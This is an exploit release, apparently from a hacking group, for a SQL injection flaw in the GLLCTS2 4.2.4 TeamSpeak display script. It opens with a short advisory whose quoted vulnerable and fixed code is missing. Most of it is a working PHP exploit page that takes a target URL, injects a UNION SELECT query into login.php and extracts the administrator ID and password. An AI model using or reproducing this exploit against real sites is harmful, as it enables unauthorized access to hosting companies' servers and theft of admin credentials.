= 4.2.4 | | ------------------------------------------------------------------------------------------------ | | Description | | ------------------------------------------------------------------------------------------------ | | The following script is used for displaying teamspeak information by users and allowing others | | to login to these servers and etc. | | | | It's most commonly used by teamspeak hosting companys which makes it kinda bad that this exists. | | | | ------------------------------------------------------------------------------------------------ | | Vulnerability | | ------------------------------------------------------------------------------------------------ | | Although the following script has multiple sql injections there is only one which we really... | | Found to be useful enough to include inside of the exploit code. | | | | So that is the only one that we will go into detail with below... | | | | If we go to login.php and view the line 20 | | | We see the following code... | | | | | | | | If you understand php you can see from this that the code is not properly sanatized before being.| | Put into the query and executed... The way it is currently would allow a remote attacker to... | | Add on SQL in order to preform a sql injection. | | | | ------------------------------------------------------------------------------------------------ | | FIX | | ------------------------------------------------------------------------------------------------ | | Take the code at login.php line 20 and make it the following... | | | | | | ------------------------------------------------------------------------------------------------ | | CREDITS | | ------------------------------------------------------------------------------------------------ | | The vulnerability was discovered remotely by DeadlyData and Kap of TheDefaced Security Team | | It was then looked at via source code and the script was fully audited to find it was more... | | Vulnerable then we had thought in total there are about 5 un sanatized user based inputs. | | | | Which may lead to more vulnerabilties such as other SQL injections or XSS flaws. | | ------------------------------------------------------------------------------------------------ | | EXPLOIT CODE... | | ------------------------------------------------------------------------------------------------ | | !NOTE!: Requires Magic Quotes GPC is set to off in your php.ini settings. | | | \__________________________________________________________________________________________________/ */ set_time_limit(0); ignore_user_abort(0); function add_html_space($count){ $out2 = str_repeat(" ",$count); return $out2; } function write_content($title,$desc,$content){ $out = "

$title

$desc

$content

"; return $out; } $title = "GLLCTS2 => v4.2.4". add_html_space(1) ." SQL Injection Exploit"; $header['banner'] = "TD's ESystem"; $header['main'] = "TD's Exploit System"; $menu['title'] = "Exploit System"; $menu['title1'] = "Esystem Home"; $menu['link1'] = "?"; $menu = "

".$menu['title']."

Links To TD

"; $copyright = "

© 2004 - 2008 The Defaced Security Team.
© 2008 $title By TheDefaced.org
"; $style = "$title
$header[main]
$menu"; echo $style; switch($_GET['page']){ default: If($_POST['inj'] == 'run'){ echo"
"; echo"

TD's Exploit System

"; echo"
Grabing Admin ID and Password via GLLC SQL injection.
"; echo"

"; $url = $_POST['url']; $prefix = $_POST['prefix']; $buf = file_get_contents($url."/login.php?detail='%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,concat(CHAR(124),CHAR(65,%2068,%2077,%2073,%2078,%2073,%2068,%2058),admin_id,CHAR(124),CHAR(80,%2065,%2083,%2083,%2058),admin_pass,CHAR(124)),13,14,15,16,17,18,19,20,21,22,23%20from%20".$prefix."_admin/*"); $arr = explode("|",$buf); foreach($arr as $line){ if(eregi("ADMINID:", $line)) If($line !=$adminid){ $adminid = $line; echo $adminid."
"; } if(eregi("PASS:",$line)) If($pass == ""){ $pass = $line; $pass_parsed = str_replace("PASS:","",$pass); echo $pass."

"; echo "Login"; } } echo"

"; echo $copyright; }else{ echo write_content("Welcome to TD's Exploit System","SQL injection exploit in GLLCTS2","
GLLCTS2 URL(No Trailing \"/\" & Include \"http://\"):


Table Prefix:
". add_html_space(1) ."

"); echo $copyright; } break; } ?>